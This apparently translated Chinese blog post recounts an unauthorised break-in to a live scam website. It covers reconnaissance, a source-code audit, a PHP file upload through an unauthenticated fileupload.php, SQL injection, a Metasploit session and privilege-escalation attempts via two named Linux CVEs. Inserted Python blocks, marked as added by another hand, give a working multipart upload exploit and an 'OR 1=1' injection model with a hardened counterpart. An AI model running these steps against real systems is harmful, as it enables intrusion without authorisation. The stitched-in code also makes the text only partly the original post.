0X00 A lucky accident
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163550961-1482957430.png)
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163551967-170841006.png)
Visiting every directory and file the scanner turned up, one by one, yielded nothing much, but it did reveal the admin backend address. phpmyadmin returns a 500.
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163552592-619563116.png)
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163558278-1710701290.png)
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163600462-682161109.png)
Tried 8888, 123456 and the like; every one came back as an error, so I closed it right there.
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163611093-700616642.png)
Subdomain brute-forcing turned up only a single one as well, and an Nmap scan found nothing of note either.
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163611615-1869783293.png)
0X01 Finding sites of the same type, and the source code
Scam operators like this rarely do their own development; the source is almost certainly downloaded from the internet and set up by someone they hired. Being uncommon is itself a fingerprint, so I searched for it.
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163612516-4532310.png)
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163613425-1885610835.png)
0X02 Starting the audit
With this many sites running it, the source must be all over the place, so I spent some time tracking it down and set about auditing it.
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163614229-1380899455.png)
I downloaded the source and scanned it with Seay. The codebase is large and I couldn't be bothered to set it up locally, so I simply used the source as a map and went at the target directly.
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163614891-59028803.png)
In it I found a fileupload.php that looked problematic.
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163615599-530832557.png)
Visiting the target confirmed the same file exists there too. I extracted it into a locally built environment for testing.
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163616300-174373103.png)
Simply visiting it auto-creates two folders, upload and upload_tmp. This thing is a demo that was left in place, and a spot like this honestly looks more like a backdoor than a feature.
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163616991-1802959290.png)
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163617559-955086106.png)
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163618229-1783550598.png)
Reading further down there are a few checks; the upload form field just needs to be named file.

File upload
Everything else can be ignored; just tweak an upload form. The only parameters needed are name and file.
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163623897-733736142.png)
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163629594-2007209689.png)
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163630237-1238685569.png)
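To reproduce the upload described above against a local copy of fileupload.php, here is an added Python example; it is not code from this post or from the scam site's source. It assumes (none of this is stated in the post) that the handler is served at `/fileupload.php` under a base URL, that only the `name` and `file` fields matter, and that uploads land under `/upload/<filename>`; because the handler returns no path, the script checks that location directly. The uploaded content is a harmless marker, not a webshell.

```python
import uuid
import urllib.error
import urllib.request

# Assumption (not from the post): a local copy of fileupload.php is served from here.
BASE_URL = "http://127.0.0.1:8080"


def build_multipart(fields, files, boundary=None):
    """Encode a multipart/form-data body by hand so every field is visible.

    fields: {field_name: text_value}
    files:  {field_name: (filename, content_bytes, content_type)}
    Returns (Content-Type header value, body bytes).
    """
    boundary = boundary or uuid.uuid4().hex
    parts = []
    for name, value in fields.items():
        parts.append(
            (
                f"--{boundary}\r\n"
                f'Content-Disposition: form-data; name="{name}"\r\n\r\n'
                f"{value}\r\n"
            ).encode()
        )
    for field, (filename, content, ctype) in files.items():
        head = (
            f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
            f"Content-Type: {ctype}\r\n\r\n"
        ).encode()
        parts.append(head + content + b"\r\n")
    parts.append(f"--{boundary}--\r\n".encode())
    return f"multipart/form-data; boundary={boundary}", b"".join(parts)


def upload_file(base_url, filename, content, timeout=10):
    """POST the file the way the post describes: a `name` field plus a `file` part."""
    ctype, body = build_multipart(
        {"name": filename},
        {"file": (filename, content, "application/octet-stream")},
    )
    req = urllib.request.Request(
        f"{base_url}/fileupload.php",
        data=body,
        method="POST",
        headers={"Content-Type": ctype},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status, resp.read()


def file_is_reachable(base_url, filename, timeout=10):
    """The handler returns no path, so check the expected upload location directly."""
    try:
        with urllib.request.urlopen(f"{base_url}/upload/{filename}", timeout=timeout) as resp:
            return resp.status == 200
    except urllib.error.HTTPError:
        return False


if __name__ == "__main__":
    # Harmless marker rather than a webshell; constructed for this demo.
    marker = b"<?php echo 'upload-check'; ?>"
    status, _ = upload_file(BASE_URL, "aaa.php", marker)
    print("upload status:", status)
    print("aaa.php reachable under /upload/:", file_is_reachable(BASE_URL, "aaa.php"))
```

On a real engagement use a unique marker filename rather than aaa.php so the file you find under upload/ is provably the one you sent, and remove it when done.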
Nothing comes back after the upload, not even a path, but aaa.php is already sitting under upload.

SQL injection
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163630965-939730268.png)
The where value in that variable comes straight from request, and the checkinput above never validates the type value either.
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163631576-1987748807.png)
Following into betListCnt:
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163632275-728616145.png)
It goes into the query with no processing at all, and there are plenty of similar spots.

0X03 Verifying the audited vulnerabilities
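Before going to the live target, here is a runnable model of what the audit found, as an added Python example rather than the project's PHP: `check_input` escapes only the parameters it is told about (the real checkinput never looks at `type`), `build_where` assembles the where string from request values, and `bet_list_cnt` drops that string into the query untouched, the way betListCnt does. The table name, columns and rows are constructed for the demo and are not the project's schema; `bet_list_cnt_safe` is the hardened counterpart with an allowlist for `type` and bound parameters.

```python
import sqlite3


def make_db():
    """Constructed table and rows for the demo (not the project's schema)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE bet (id INTEGER PRIMARY KEY, uid INTEGER, type INTEGER, amount INTEGER);
        INSERT INTO bet VALUES (1, 7, 1, 100), (2, 7, 2, 50), (3, 8, 1, 20), (4, 9, 3, 10);
    """)
    return con


def check_input(request, keys):
    """Models checkinput: only the listed keys are escaped; anything else passes through raw."""
    return {k: (v.replace("'", "''") if k in keys else v) for k, v in request.items()}


def build_where(request):
    """Models the caller: the where string is built from request values, type concatenated as-is."""
    where = f"uid = {int(request['uid'])}"
    if request.get("type"):
        where += f" AND type = {request['type']}"
    return where


def bet_list_cnt(con, where):
    """Vulnerable, like betListCnt: the where string goes straight into the SQL."""
    return con.execute(f"SELECT COUNT(*) FROM bet WHERE {where}").fetchone()[0]


ALLOWED_TYPES = {1, 2, 3}


def bet_list_cnt_safe(con, request):
    """Hardened: validate type against an allowlist and bind every value."""
    sql = "SELECT COUNT(*) FROM bet WHERE uid = ?"
    params = [int(request["uid"])]
    if request.get("type"):
        bet_type = int(request["type"])  # "1 OR 1=1" raises ValueError here
        if bet_type not in ALLOWED_TYPES:
            raise ValueError(f"unexpected type: {bet_type}")
        sql += " AND type = ?"
        params.append(bet_type)
    return con.execute(sql, params).fetchone()[0]


def safe_rejects(request):
    """True if the hardened query refuses the request instead of running it."""
    try:
        bet_list_cnt_safe(make_db(), request)
    except ValueError:
        return True
    return False


def demo():
    con = make_db()
    # checkinput only covers uid; type is never looked at, exactly the gap the audit found.
    benign = check_input({"uid": "7", "type": "1"}, keys=("uid",))
    hostile = check_input({"uid": "7", "type": "1 OR 1=1"}, keys=("uid",))
    return {
        "benign_count": bet_list_cnt(con, build_where(benign)),     # one row: uid 7, type 1
        "injected_where": build_where(hostile),                     # uid = 7 AND type = 1 OR 1=1
        "injected_count": bet_list_cnt(con, build_where(hostile)),  # OR 1=1 widens it to all 4 rows
        "safe_count": bet_list_cnt_safe(con, benign),               # one row again
        "safe_rejects_injection": safe_rejects(hostile),            # True
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The point of the model is the mismatch the audit flagged: escaping a fixed list of parameters says nothing about a parameter the list omits, and once `where` is a string, the database cannot tell data from syntax. Binding values and allowlisting `type` fixes both at once.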
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163638479-34676068.png)
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163639155-947150883.png)
Port 6379 is open, but the redis behind it was not started as root.
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163639774-1341262932.png)
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163640376-2025728682.png)
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163641076-2033354811.png)
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163641699-1643228765.png)
For convenience I brought the box online with msf, then went looking for a matching privilege-escalation exploit.

0X04 Attempting privilege escalation
Found these two: CVE-2019-13272 and CVE-2017-16995. While hunting for exploit tools on GitHub, I remembered that msf ships its own privilege-escalation modules as well.
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163642401-1392405184.png)
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163643225-1758753628.png)
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163648873-801114162.png)
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163649541-196806770.png)
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163650162-939513213.png)
![image](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163650836-1046375393.png)
posted @ 2024-01-05 16:37 渗透测试中心